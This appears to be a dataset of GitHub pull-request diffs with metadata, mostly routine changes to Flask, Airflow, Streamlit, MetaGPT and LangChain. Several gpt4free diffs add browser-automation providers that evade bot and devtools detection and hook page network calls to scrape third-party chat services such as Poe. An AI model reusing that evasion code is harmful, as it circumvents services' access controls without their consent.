from .ChatgptAi import ChatgptAi
from .ChatgptDemo import ChatgptDemo
-from .ChatgptDuo import ChatgptDuo
from .ChatgptFree import ChatgptFree
from .ChatgptLogin import ChatgptLogin
from .ChatgptX import ChatgptX
-from .Cromicle import Cromicle
from .DeepInfra import DeepInfra
from .FakeGpt import FakeGpt
from .FreeGpt import FreeGpt
diff --git a/g4f/Provider/Acytoo.py b/g4f/Provider/deprecated/Acytoo.py
similarity index 92%
rename from g4f/Provider/Acytoo.py
rename to g4f/Provider/deprecated/Acytoo.py
index 4dee176a77..0379fdd653 100644
--- a/g4f/Provider/Acytoo.py
+++ b/g4f/Provider/deprecated/Acytoo.py
@@ -2,8 +2,8 @@
from aiohttp import ClientSession
-from ..typing import AsyncResult, Messages
-from .base_provider import AsyncGeneratorProvider
+from ...typing import AsyncResult, Messages
+from ..base_provider import AsyncGeneratorProvider
class Acytoo(AsyncGeneratorProvider):
diff --git a/g4f/Provider/Aibn.py b/g4f/Provider/deprecated/Aibn.py
similarity index 89%
rename from g4f/Provider/Aibn.py
rename to g4f/Provider/deprecated/Aibn.py
index 1f81a61e25..60cef1e48c 100644
--- a/g4f/Provider/Aibn.py
+++ b/g4f/Provider/deprecated/Aibn.py
@@ -3,9 +3,9 @@
import time
import hashlib
-from ..typing import AsyncResult, Messages
-from ..requests import StreamSession
-from .base_provider import AsyncGeneratorProvider
+from ...typing import AsyncResult, Messages
+from ...requests import StreamSession
+from ..base_provider import AsyncGeneratorProvider
class Aibn(AsyncGeneratorProvider):
diff --git a/g4f/Provider/Ails.py b/g4f/Provider/deprecated/Ails.py
similarity index 96%
rename from g4f/Provider/Ails.py
rename to g4f/Provider/deprecated/Ails.py
index 58010756c3..93c63a6937 100644
--- a/g4f/Provider/Ails.py
+++ b/g4f/Provider/deprecated/Ails.py
@@ -7,8 +7,8 @@
from datetime import datetime
from aiohttp import ClientSession
-from ..typing import SHA256, AsyncResult, Messages
-from .base_provider import AsyncGeneratorProvider
+from ...typing import SHA256, AsyncResult, Messages
+from ..base_provider import AsyncGeneratorProvider
class Ails(AsyncGeneratorProvider):
diff --git a/g4f/Provider/ChatgptDuo.py b/g4f/Provider/deprecated/ChatgptDuo.py
similarity index 94%
rename from g4f/Provider/ChatgptDuo.py
rename to g4f/Provider/deprecated/ChatgptDuo.py
index fef3f85679..c77c6a1c6b 100644
--- a/g4f/Provider/ChatgptDuo.py
+++ b/g4f/Provider/deprecated/ChatgptDuo.py
@@ -1,8 +1,8 @@
from __future__ import annotations
-from ..typing import Messages
+from ...typing import Messages
from curl_cffi.requests import AsyncSession
-from .base_provider import AsyncProvider, format_prompt
+from ..base_provider import AsyncProvider, format_prompt
class ChatgptDuo(AsyncProvider):
diff --git a/g4f/Provider/Cromicle.py b/g4f/Provider/deprecated/Cromicle.py
similarity index 89%
rename from g4f/Provider/Cromicle.py
rename to g4f/Provider/deprecated/Cromicle.py
index 8deb79c1a3..9f986cb51a 100644
--- a/g4f/Provider/Cromicle.py
+++ b/g4f/Provider/deprecated/Cromicle.py
@@ -2,10 +2,10 @@
from aiohttp import ClientSession
from hashlib import sha256
-from ..typing import AsyncResult, Messages, Dict
+from ...typing import AsyncResult, Messages, Dict
-from .base_provider import AsyncGeneratorProvider
-from .helper import format_prompt
+from ..base_provider import AsyncGeneratorProvider
+from ..helper import format_prompt
class Cromicle(AsyncGeneratorProvider):
diff --git a/g4f/Provider/deprecated/__init__.py b/g4f/Provider/deprecated/__init__.py
index f8e35b37c8..ca5ac83e11 100644
--- a/g4f/Provider/deprecated/__init__.py
+++ b/g4f/Provider/deprecated/__init__.py
@@ -13,4 +13,9 @@
from .Aivvm import Aivvm
from .Vitalentum import Vitalentum
from .H2o import H2o
-from .Myshell import Myshell
\ No newline at end of file
+from .Myshell import Myshell
+from .Acytoo import Acytoo
+from .Aibn import Aibn
+from .Ails import Ails
+from .ChatgptDuo import ChatgptDuo
+from .Cromicle import Cromicle
\ No newline at end of file
diff --git a/g4f/models.py b/g4f/models.py
index 0ce7b88673..cdca0e3fa2 100644
--- a/g4f/models.py
+++ b/g4f/models.py
@@ -15,10 +15,8 @@
Berlin,
Llama2,
Vercel,
- Aichat,
GPTalk,
Koala,
- AiAsk,
GptGo,
Phind,
Bard,
@@ -42,7 +40,7 @@ def __all__() -> list[str]:
base_provider = "",
best_provider = RetryProvider([
Bing, # Not fully GPT 3 or 4
- AiAsk, Aichat, ChatgptAi, FreeGpt, GptGo, GeekGpt,
+ ChatgptAi, GptGo, GeekGpt,
Phind, You
])
)
| https://api.github.com/repos/xtekky/gpt4free/pulls/1247 | 2023-11-13T17:59:10Z | 2023-11-15T17:25:28Z | 2023-11-15T17:25:28Z | 2023-11-15T17:25:28Z | 2,727 | xtekky/gpt4free | 38,254 |
|
Add Poe Provider, Update AItianhuSpace Porvider | diff --git a/g4f/Provider/AItianhuSpace.py b/g4f/Provider/AItianhuSpace.py
index d316fc6fd0..a9a824cf5b 100644
--- a/g4f/Provider/AItianhuSpace.py
+++ b/g4f/Provider/AItianhuSpace.py
@@ -1,95 +1,128 @@
from __future__ import annotations
-import random, json
-from .. import debug
-from ..typing import AsyncResult, Messages
-from ..requests import StreamSession
-from .base_provider import AsyncGeneratorProvider, format_prompt, get_cookies
+import time
+import random
-domains = {
- "gpt-3.5-turbo": "aitianhu.space",
- "gpt-4": "aitianhu.website",
-}
+from ..typing import CreateResult, Messages
+from .base_provider import BaseProvider
+from .helper import WebDriver, format_prompt, get_browser
+from .. import debug
-class AItianhuSpace(AsyncGeneratorProvider):
+class AItianhuSpace(BaseProvider):
url = "https://chat3.aiyunos.top/"
working = True
supports_gpt_35_turbo = True
+ _domains = ["aitianhu.com", "aitianhu1.top"]
@classmethod
- async def create_async_generator(cls,
- model: str,
- messages: Messages,
- proxy: str = None,
- domain: str = None,
- cookies: dict = None,
- timeout: int = 10, **kwargs) -> AsyncResult:
-
+ def create_completion(
+ cls,
+ model: str,
+ messages: Messages,
+ stream: bool,
+ domain: str = None,
+ proxy: str = None,
+ timeout: int = 120,
+ browser: WebDriver = None,
+ hidden_display: bool = True,
+ **kwargs
+ ) -> CreateResult:
if not model:
model = "gpt-3.5-turbo"
-
- elif model not in domains:
- raise ValueError(f"Model are not supported: {model}")
-
if not domain:
chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
rand = ''.join(random.choice(chars) for _ in range(6))
- domain = f"{rand}.{domains[model]}"
-
+ domain = random.choice(cls._domains)
+ domain = f"{rand}.{domain}"
if debug.logging:
print(f"AItianhuSpace | using domain: {domain}")
+ url = f"https://{domain}"
+ prompt = format_prompt(messages)
+ if browser:
+ driver = browser
+ else:
+ if hidden_display:
+ driver, display = get_browser("", True, proxy)
+ else:
+ driver = get_browser("", False, proxy)
- if not cookies:
- cookies = get_cookies('.aitianhu.space')
- if not cookies:
- raise RuntimeError(f"g4f.provider.{cls.__name__} requires cookies [refresh https://{domain} on chrome]")
+ from selenium.webdriver.common.by import By
+ from selenium.webdriver.support.ui import WebDriverWait
+ from selenium.webdriver.support import expected_conditions as EC
- url = f'https://{domain}'
- async with StreamSession(proxies={"https": proxy},
- cookies=cookies, timeout=timeout, impersonate="chrome110", verify=False) as session:
-
- data = {
- "prompt": format_prompt(messages),
- "options": {},
- "systemMessage": "You are ChatGPT, a large language model trained by OpenAI. Follow the user's instructions carefully.",
- "temperature": 0.8,
- "top_p": 1,
- **kwargs
- }
- headers = {
- "Authority": url,
- "Accept": "application/json, text/plain, */*",
- "Origin": url,
- "Referer": f"{url}/"
- }
- async with session.post(f"{url}/api/chat-process", json=data, headers=headers) as response:
- response.raise_for_status()
- async for line in response.iter_lines():
- if line == b"<script>":
- raise RuntimeError("Solve challenge and pass cookies and a fixed domain")
- if b"platform's risk control" in line:
- raise RuntimeError("Platform's Risk Control")
- line = json.loads(line)
- if "detail" in line:
- if content := line["detail"]["choices"][0]["delta"].get(
- "content"
- ):
- yield content
- elif "message" in line and "AI-4接口非常昂贵" in line["message"]:
- raise RuntimeError("Rate limit for GPT 4 reached")
- else:
- raise RuntimeError(f"Response: {line}")
-
+ wait = WebDriverWait(driver, timeout)
- @classmethod
- @property
- def params(cls):
- params = [
- ("model", "str"),
- ("messages", "list[dict[str, str]]"),
- ("stream", "bool"),
- ("temperature", "float"),
- ("top_p", "int"),
- ]
- param = ", ".join([": ".join(p) for p in params])
- return f"g4f.provider.{cls.__name__} supports: ({param})"
+ # Bypass devtools detection
+ driver.get("https://blank.page/")
+ wait.until(EC.visibility_of_element_located((By.ID, "sheet")))
+ driver.execute_script(f"""
+document.getElementById('sheet').addEventListener('click', () => {{
+ window.open('{url}', '_blank');
+}});
+""")
+ driver.find_element(By.ID, "sheet").click()
+ time.sleep(10)
+
+ original_window = driver.current_window_handle
+ for window_handle in driver.window_handles:
+ if window_handle != original_window:
+ driver.switch_to.window(window_handle)
+ break
+
+ wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, "textarea.n-input__textarea-el")))
+
+ try:
+ # Add hook in XMLHttpRequest
+ script = """
+const _http_request_open = XMLHttpRequest.prototype.open;
+window._last_message = window._message = "";
+window._loadend = false;
+XMLHttpRequest.prototype.open = function(method, url) {
+ if (url == "/api/chat-process") {
+ this.addEventListener("progress", (event) => {
+ const lines = this.responseText.split("\\n");
+ try {
+ window._message = JSON.parse(lines[lines.length-1])["text"];
+ } catch(e) { }
+ });
+ this.addEventListener("loadend", (event) => {
+ window._loadend = true;
+ });
+ }
+ return _http_request_open.call(this, method, url);
+}
+"""
+ driver.execute_script(script)
+
+ # Input and submit prompt
+ driver.find_element(By.CSS_SELECTOR, "textarea.n-input__textarea-el").send_keys(prompt)
+ driver.find_element(By.CSS_SELECTOR, "button.n-button.n-button--primary-type.n-button--medium-type").click()
+
+ # Yield response
+ while True:
+ chunk = driver.execute_script("""
+if (window._message && window._message != window._last_message) {
+ try {
+ return window._message.substring(window._last_message.length);
+ } finally {
+ window._last_message = window._message;
+ }
+}
+if (window._loadend) {
+ return null;
+}
+return "";
+""")
+ if chunk:
+ yield chunk
+ elif chunk != "":
+ break
+ else:
+ time.sleep(0.1)
+ finally:
+ driver.close()
+ if not browser:
+ time.sleep(0.1)
+ driver.quit()
+ if hidden_display:
+ display.stop()
\ No newline at end of file
diff --git a/g4f/Provider/MyShell.py b/g4f/Provider/MyShell.py
index 70fd35091d..0efeb0e828 100644
--- a/g4f/Provider/MyShell.py
+++ b/g4f/Provider/MyShell.py
@@ -38,11 +38,11 @@ def create_completion(
driver.get(cls.url)
try:
- # Wait for page load
+ # Wait for page load and cloudflare validation
WebDriverWait(driver, timeout).until(
EC.presence_of_element_located((By.CSS_SELECTOR, "body:not(.no-js)"))
)
- # Send message
+ # Send request with message
script = """
response = await fetch("https://api.myshell.ai/v1/bot/chat/send_message", {
"headers": {
@@ -66,7 +66,7 @@ def create_completion(
script = """
chunk = await window.reader.read();
if (chunk['done']) return null;
-text = (new TextDecoder ()).decode(chunk['value']);
+text = (new TextDecoder()).decode(chunk['value']);
content = '';
text.split('\\n').forEach((line, index) => {
if (line.startsWith('data: ')) {
@@ -81,7 +81,7 @@ def create_completion(
return content;
"""
while True:
- chunk = driver.execute_script(script):
+ chunk = driver.execute_script(script)
if chunk:
yield chunk
elif chunk != "":
diff --git a/g4f/Provider/helper.py b/g4f/Provider/helper.py
index cad32f053e..b10c912af6 100644
--- a/g4f/Provider/helper.py
+++ b/g4f/Provider/helper.py
@@ -18,10 +18,10 @@
BrowserCookieError
)
try:
- from selenium.webdriver.remote.webdriver import WebDriver
- except ImportError:
- class WebDriver():
- pass
+ from selenium.webdriver.remote.webdriver import WebDriver
+except ImportError:
+ class WebDriver():
+ pass
try:
from undetected_chromedriver import Chrome, ChromeOptions
except ImportError:
@@ -153,7 +153,7 @@ def get_browser(
if proxy:
if not options:
options = ChromeOptions()
- options.add_argument(f'--proxy-server={proxy}')
+ options.add_argument(f'--proxy-server={proxy}')
browser = Chrome(user_data_dir=user_data_dir, options=options)
if hidden_display:
diff --git a/g4f/Provider/needs_auth/Poe.py b/g4f/Provider/needs_auth/Poe.py
new file mode 100644
index 0000000000..6fbf7fd4ec
--- /dev/null
+++ b/g4f/Provider/needs_auth/Poe.py
@@ -0,0 +1,129 @@
+from __future__ import annotations
+
+import time
+
+from ...typing import CreateResult, Messages
+from ..base_provider import BaseProvider
+from ..helper import WebDriver, format_prompt, get_browser
+
+models = {
+ "meta-llama/Llama-2-7b-chat-hf": {"name": "Llama-2-7b"},
+ "meta-llama/Llama-2-13b-chat-hf": {"name": "Llama-2-13b"},
+ "meta-llama/Llama-2-70b-chat-hf": {"name": "Llama-2-70b"},
+ "codellama/CodeLlama-7b-Instruct-hf": {"name": "Code-Llama-7b"},
+ "codellama/CodeLlama-13b-Instruct-hf": {"name": "Code-Llama-13b"},
+ "codellama/CodeLlama-34b-Instruct-hf": {"name": "Code-Llama-34b"},
+ "gpt-3.5-turbo": {"name": "GPT-3.5-Turbo"},
+ "gpt-3.5-turbo-instruct": {"name": "GPT-3.5-Turbo-Instruct"},
+ "gpt-4": {"name": "GPT-4"},
+ "palm": {"name": "Google-PaLM"},
+}
+
+class Poe(BaseProvider):
+ url = "https://poe.com"
+ working = True
+ supports_gpt_35_turbo = True
+ supports_stream = True
+
+ @classmethod
+ def create_completion(
+ cls,
+ model: str,
+ messages: Messages,
+ stream: bool,
+ proxy: str = None,
+ browser: WebDriver = None,
+ hidden_display: bool = True,
+ **kwargs
+ ) -> CreateResult:
+ if not model:
+ model = "gpt-3.5-turbo"
+ elif model not in models:
+ raise ValueError(f"Model are not supported: {model}")
+ prompt = format_prompt(messages)
+ if browser:
+ driver = browser
+ else:
+ if hidden_display:
+ driver, display = get_browser(None, True, proxy)
+ else:
+ driver = get_browser(None, False, proxy)
+
+ script = """
+window._message = window._last_message = "";
+window._message_finished = false;
+class ProxiedWebSocket extends WebSocket {
+ constructor(url, options) {
+ super(url, options);
+ this.addEventListener("message", (e) => {
+ const data = JSON.parse(JSON.parse(e.data)["messages"][0])["payload"]["data"];
+ if ("messageAdded" in data) {
+ if (data["messageAdded"]["author"] != "human") {
+ window._message = data["messageAdded"]["text"];
+ if (data["messageAdded"]["state"] == "complete") {
+ window._message_finished = true;
+ }
+ }
+ }
+ });
+ }
+}
+window.WebSocket = ProxiedWebSocket;
+"""
+ driver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
+ "source": script
+ })
+
+ from selenium.webdriver.common.by import By
+ from selenium.webdriver.support.ui import WebDriverWait
+ from selenium.webdriver.support import expected_conditions as EC
+
+ try:
+ driver.get(f"{cls.url}/{models[model]['name']}")
+ wait = WebDriverWait(driver, 10 if hidden_display else 240)
+ wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, "textarea[class^='GrowingTextArea']")))
+ except:
+ # Reopen browser for login
+ if not browser:
+ driver.quit()
+ if hidden_display:
+ display.stop()
+ driver = get_browser(None, False, proxy)
+ driver.get(f"{cls.url}/{models[model]['name']}")
+ wait = WebDriverWait(driver, 240)
+ wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, "textarea[class^='GrowingTextArea']")))
+ else:
+ raise RuntimeError("Prompt textarea not found. You may not be logged in.")
+
+ driver.find_element(By.CSS_SELECTOR, "footer textarea[class^='GrowingTextArea']").send_keys(prompt)
+ driver.find_element(By.CSS_SELECTOR, "footer button[class*='ChatMessageSendButton']").click()
+
+ try:
+ script = """
+if(window._message && window._message != window._last_message) {
+ try {
+ return window._message.substring(window._last_message.length);
+ } finally {
+ window._last_message = window._message;
+ }
+} else if(window._message_finished) {
+ return null;
+} else {
+ return '';
+}
+"""
+ while True:
+ chunk = driver.execute_script(script)
+ if chunk:
+ yield chunk
+ elif chunk != "":
+ break
+ else:
+ time.sleep(0.1)
+ finally:
+ driver.close()
+ if not browser:
+ time.sleep(0.1)
+ driver.quit()
+ if hidden_display:
+ display.stop()
\ No newline at end of file
diff --git a/g4f/Provider/needs_auth/__init__.py b/g4f/Provider/needs_auth/__init__.py
index 815194c4c7..4230253ea1 100644
--- a/g4f/Provider/needs_auth/__init__.py
+++ b/g4f/Provider/needs_auth/__init__.py
@@ -3,4 +3,5 @@
from .Theb import Theb
from .HuggingChat import HuggingChat
from .OpenaiChat import OpenaiChat
-from .OpenAssistant import OpenAssistant
\ No newline at end of file
+from .OpenAssistant import OpenAssistant
+from .Poe import Poe
\ No newline at end of file
| https://api.github.com/repos/xtekky/gpt4free/pulls/1261 | 2023-11-17T02:19:47Z | 2023-11-17T02:21:51Z | 2023-11-17T02:21:50Z | 2023-11-17T02:21:51Z | 3,730 | xtekky/gpt4free | 38,170 |
|
Use print() function in both Python 2 and Python 3 | diff --git a/Web Sockets/Files/ws-harness.py b/Web Sockets/Files/ws-harness.py
index 7e3a2f633c..1fea6ecafb 100644
--- a/Web Sockets/Files/ws-harness.py
+++ b/Web Sockets/Files/ws-harness.py
@@ -1,4 +1,5 @@
#!/usr/bin/python
+from __future__ import print_function
import socket,ssl
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from websocket import create_connection, WebSocket
@@ -9,7 +10,7 @@
LOOP_BACK_PORT_NUMBER = 8000
def FuzzWebSocket(fuzz_value):
- print fuzz_value
+ print(fuzz_value)
ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
result = ws.recv()
return result
@@ -22,7 +23,7 @@ def LoadMessage(file):
file_contents = f.read()
f.close()
except:
- print ("Error reading file: %s" % file)
+ print("Error reading file: %s" % file)
exit()
return file_contents
@@ -52,12 +53,12 @@ def do_GET(self):
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
- print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
+ print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)
#Wait forever for incoming http requests
server.serve_forever()
except KeyboardInterrupt:
- print '^C received, shutting down the web server'
+ print('^C received, shutting down the web server')
server.socket.close()
- ws.close()
\ No newline at end of file
+ ws.close()
| Legacy __print__ statements are syntax errors in Python 3 but __print()__ function works as expected in both Python 2 and Python 3. | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/66 | 2019-04-26T18:35:24Z | 2019-04-26T23:02:09Z | 2019-04-26T23:02:09Z | 2019-04-26T23:50:18Z | 404 | swisskyrepo/PayloadsAllTheThings | 8,479 |
Update docstring for errorhandler() | diff --git a/flask/app.py b/flask/app.py
index 59c77a1587..68de2b904b 100644
--- a/flask/app.py
+++ b/flask/app.py
@@ -1153,7 +1153,8 @@ def page_not_found(error):
that do not necessarily have to be a subclass of the
:class:`~werkzeug.exceptions.HTTPException` class.
- :param code: the code as integer for the handler
+ :param code_or_exception: the code as integer for the handler, or
+ an arbitrary exception
"""
def decorator(f):
self._register_error_handler(None, code_or_exception, f)
| update the `:param` definition for the `errorhandler()` decorator in `app.py`. | https://api.github.com/repos/pallets/flask/pulls/2070 | 2016-10-31T15:27:31Z | 2016-10-31T16:41:38Z | 2016-10-31T16:41:38Z | 2020-11-14T04:33:09Z | 151 | pallets/flask | 20,828 |
Don't add license headers for files in "node_modules" and "cypress" folders | diff --git a/scripts/add_license_headers.py b/scripts/add_license_headers.py
index 329f0ac4b7ca..ad4679aa627f 100755
--- a/scripts/add_license_headers.py
+++ b/scripts/add_license_headers.py
@@ -35,6 +35,8 @@
"/gen/",
"/static/",
"/vendor/",
+ "/node_modules/",
+ "/cypress/",
"/react-app-env.d.ts",
"/css/variables.scss", # scss-to-json doesn't like our normal header.
]
| Added `node_modules` and `cypress` folders to `EXCLUDE_PATTERNS`. | https://api.github.com/repos/streamlit/streamlit/pulls/2655 | 2021-01-25T10:06:03Z | 2021-01-25T19:12:44Z | 2021-01-25T19:12:44Z | 2021-07-24T00:37:01Z | 117 | streamlit/streamlit | 21,671 |
fix:const.py add CONFIG_ROOT | diff --git a/metagpt/const.py b/metagpt/const.py
index a57be641b..828fb2f05 100644
--- a/metagpt/const.py
+++ b/metagpt/const.py
@@ -47,7 +47,7 @@ def get_metagpt_root():
# METAGPT PROJECT ROOT AND VARS
-
+CONFIG_ROOT = Path.home() / ".metagpt"
METAGPT_ROOT = get_metagpt_root() # Dependent on METAGPT_PROJECT_ROOT
DEFAULT_WORKSPACE_ROOT = METAGPT_ROOT / "workspace"
| **Features**
<!-- Clear and direct description of the submit features. -->
<!-- If it's a bug fix, please also paste the issue link. -->
- xx
- yy
**Feature Docs**
<!-- The RFC, tutorial, or use cases about the feature if it's a pretty big update. If not, there is no need to fill. -->
**Influence**
<!-- Tell me the impact of the new feature and I'll focus on it. -->
**Result**
<!-- The screenshot/log of unittest/running result -->
**Other**
<!-- Something else about this PR. --> | https://api.github.com/repos/geekan/MetaGPT/pulls/1157 | 2024-04-03T02:32:35Z | 2024-04-03T02:36:58Z | 2024-04-03T02:36:58Z | 2024-04-03T02:36:58Z | 131 | geekan/MetaGPT | 16,665 |
[AIRFLOW-6238] Filter dags returned by dag_stats | diff --git a/airflow/www/templates/airflow/dags.html b/airflow/www/templates/airflow/dags.html
index a356b8dff2b68..57ba2607b3848 100644
--- a/airflow/www/templates/airflow/dags.html
+++ b/airflow/www/templates/airflow/dags.html
@@ -328,7 +328,7 @@ <h2>DAGs</h2>
}
d3.selectAll(".loading-last-run").remove();
});
- d3.json("{{ url_for('Airflow.dag_stats') }}", function(error, json) {
+ d3.json("{{ url_for('Airflow.dag_stats') }}?dag_ids=" + (encoded_dag_ids.join(',')), function(error, json) {
for(var dag_id in json) {
states = json[dag_id];
g = d3.select('svg#dag-run-' + dag_id.replace(/\./g, '__dot__'))
diff --git a/airflow/www/views.py b/airflow/www/views.py
index 527907270acf4..a23b6e64186f0 100644
--- a/airflow/www/views.py
+++ b/airflow/www/views.py
@@ -298,34 +298,46 @@ def get_int_arg(value, default=0):
def dag_stats(self, session=None):
dr = models.DagRun
- filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()
+ allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()
+ if 'all_dags' in allowed_dag_ids:
+ allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]
dag_state_stats = session.query(dr.dag_id, dr.state, sqla.func.count(dr.state))\
.group_by(dr.dag_id, dr.state)
+ # Filter by get parameters
+ selected_dag_ids = {
+ unquote(dag_id) for dag_id in request.args.get('dag_ids', '').split(',') if dag_id
+ }
+
+ if selected_dag_ids:
+ filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)
+ else:
+ filter_dag_ids = allowed_dag_ids
+
+ if not filter_dag_ids:
+ return wwwutils.json_response({})
+
payload = {}
- if filter_dag_ids:
- if 'all_dags' not in filter_dag_ids:
- dag_state_stats = dag_state_stats.filter(dr.dag_id.in_(filter_dag_ids))
- data = {}
- for dag_id, state, count in dag_state_stats:
- if dag_id not in data:
- data[dag_id] = {}
- data[dag_id][state] = count
-
- if 'all_dags' in filter_dag_ids:
- filter_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]
-
- for dag_id in filter_dag_ids:
- payload[dag_id] = []
- for state in State.dag_states:
- count = data.get(dag_id, {}).get(state, 0)
- payload[dag_id].append({
- 'state': state,
- 'count': count,
- 'dag_id': dag_id,
- 'color': State.color(state)
- })
+ dag_state_stats = dag_state_stats.filter(dr.dag_id.in_(filter_dag_ids))
+ data = {}
+
+ for dag_id, state, count in dag_state_stats:
+ if dag_id not in data:
+ data[dag_id] = {}
+ data[dag_id][state] = count
+
+ for dag_id in filter_dag_ids:
+ payload[dag_id] = []
+ for state in State.dag_states:
+ count = data.get(dag_id, {}).get(state, 0)
+ payload[dag_id].append({
+ 'state': state,
+ 'count': count,
+ 'dag_id': dag_id,
+ 'color': State.color(state)
+ })
+
return wwwutils.json_response(payload)
@expose('/task_stats')
diff --git a/tests/www/test_views.py b/tests/www/test_views.py
index 2d9d353ab89ff..ec3709097fb18 100644
--- a/tests/www/test_views.py
+++ b/tests/www/test_views.py
@@ -1395,6 +1395,22 @@ def test_dag_stats_success_for_all_dag_user(self):
self.check_content_in_response('example_subdag_operator', resp)
self.check_content_in_response('example_bash_operator', resp)
+ def test_dag_stats_success_when_selecting_dags(self):
+ resp = self.client.get('dag_stats?dag_ids=example_subdag_operator', follow_redirects=True)
+ self.assertEqual(resp.status_code, 200)
+ stats = json.loads(resp.data.decode('utf-8'))
+ self.assertNotIn('example_bash_operator', stats)
+ self.assertIn('example_subdag_operator', stats)
+
+ # Multiple
+ resp = self.client.get('dag_stats?dag_ids=example_subdag_operator,example_bash_operator',
+ follow_redirects=True)
+ self.assertEqual(resp.status_code, 200)
+ stats = json.loads(resp.data.decode('utf-8'))
+ self.assertIn('example_bash_operator', stats)
+ self.assertIn('example_subdag_operator', stats)
+ self.check_content_not_in_response('example_xcom', resp)
+
def test_task_stats_success(self):
self.logout()
self.login()
| ### Jira
- [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title.
- https://issues.apache.org/jira/browse/AIRFLOW-6238
### Description
- [x] Here are some details about my PR, including screenshots of any UI changes:
The dag_stats endpoint returns all dags by default. This can result in an extremely large payload ~ 3mb and slow response time when you have a lot of dags (In our case 1500+).
The accompanying pull request adds a dag_ids get parameter to the dag_stats end point which is populated by the dags present on the page.
Please see related and merged issue for task_stats: https://issues.apache.org/jira/browse/AIRFLOW-6095
### Tests
- [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
### Commits
- [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [ ] In case of new functionality, my PR adds documentation that describes how to use it.
- All the public functions and the classes in the PR contain docstrings that explain what it does
- If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to a appropriate release
NA. | https://api.github.com/repos/apache/airflow/pulls/6803 | 2019-12-12T15:50:29Z | 2019-12-13T09:33:47Z | 2019-12-13T09:33:47Z | 2019-12-13T09:33:47Z | 1,247 | apache/airflow | 14,613 |
fix finding time to become a better developer url | diff --git a/README.md b/README.md
index 70a8c0c..2775849 100644
--- a/README.md
+++ b/README.md
@@ -121,7 +121,7 @@ Let's be honest: algo can be a pretty dry topic. [This quora question](https://w
* [The traits of a proficient programmer](https://www.oreilly.com/ideas/the-traits-of-a-proficient-programmer)
* [The tao of programming](http://www.mit.edu/~xela/tao.html): a set of parables about programming.
* [Taking Ownership Is The Most Effective Way to Get What You Want](http://www.theeffectiveengineer.com/blog/take-ownership-of-your-goals)
-* [Finding Time to Become a Better Developer](https://medium.freecodecamp.com/finding-time-to-become-a-better-developer-eebc154881b2#.4i2t1z6q2)
+* [Finding Time to Become a Better Developer](https://medium.freecodecamp.org/finding-time-to-become-a-better-developer-eebc154881b2)
### Automation
| noticed the link was broken. this fixes it 😎 | https://api.github.com/repos/charlax/professional-programming/pulls/13 | 2019-01-20T08:26:43Z | 2019-01-20T17:45:35Z | 2019-01-20T17:45:35Z | 2019-01-20T17:45:41Z | 253 | charlax/professional-programming | 21,546 |
LS0010 | diff --git a/poetry.lock b/poetry.lock
index 3ef9848db190a1..071c60e4615d68 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -4730,14 +4730,14 @@ all = ["datasets (>=2.12.0,<3.0.0)", "nltk (>=3.8.1,<4.0.0)", "openai (>=0.27.6,
[[package]]
name = "langsmith"
-version = "0.0.9"
+version = "0.0.10"
description = "Client library to connect to the LangSmith LLM Tracing and Evaluation Platform."
category = "main"
optional = false
python-versions = ">=3.8.1,<4.0"
files = [
- {file = "langsmith-0.0.9-py3-none-any.whl", hash = "sha256:9c096ff6527ef4456fce7e54ed6f54e761f9f270862876fb2180a9338fc5fd1a"},
- {file = "langsmith-0.0.9.tar.gz", hash = "sha256:c8d953ea0474aecd74859e2fc76a7c2099d2adc07c8cecdbd1f00e749a12288b"},
+ {file = "langsmith-0.0.10-py3-none-any.whl", hash = "sha256:716412979613a5eb550c9bce33165cd1bad296eb19009040155deccef427ef07"},
+ {file = "langsmith-0.0.10.tar.gz", hash = "sha256:11e5db0d8e29ee5583cabd872eeece8ce50738737b1f52f316ac984f4a1a58c5"},
]
[package.dependencies]
@@ -12854,4 +12854,4 @@ text-helpers = ["chardet"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.8.1,<4.0"
-content-hash = "9eb29c9258d3b28b022dee152627b33e6ded1064f6e071ec246e92de42e57cfb"
+content-hash = "cae082b5f45fe5564de8320fd1f39370f5e59389bf3aaa72291be531bce2e705"
diff --git a/pyproject.toml b/pyproject.toml
index c6f3893aca281e..1d41c59a7b5d54 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -120,7 +120,7 @@ cassio = {version = "^0.0.7", optional = true}
rdflib = {version = "^6.3.2", optional = true}
sympy = {version = "^1.12", optional = true}
rapidfuzz = {version = "^3.1.1", optional = true}
-langsmith = "^0.0.9"
+langsmith = "^0.0.10"
rank-bm25 = {version = "^0.2.2", optional = true}
[tool.poetry.group.docs.dependencies]
| Bump langsmith version. Has some additional UX improvements | https://api.github.com/repos/langchain-ai/langchain/pulls/7871 | 2023-07-18T07:19:24Z | 2023-07-18T07:28:38Z | 2023-07-18T07:28:38Z | 2023-07-18T07:28:38Z | 746 | langchain-ai/langchain | 43,487 |
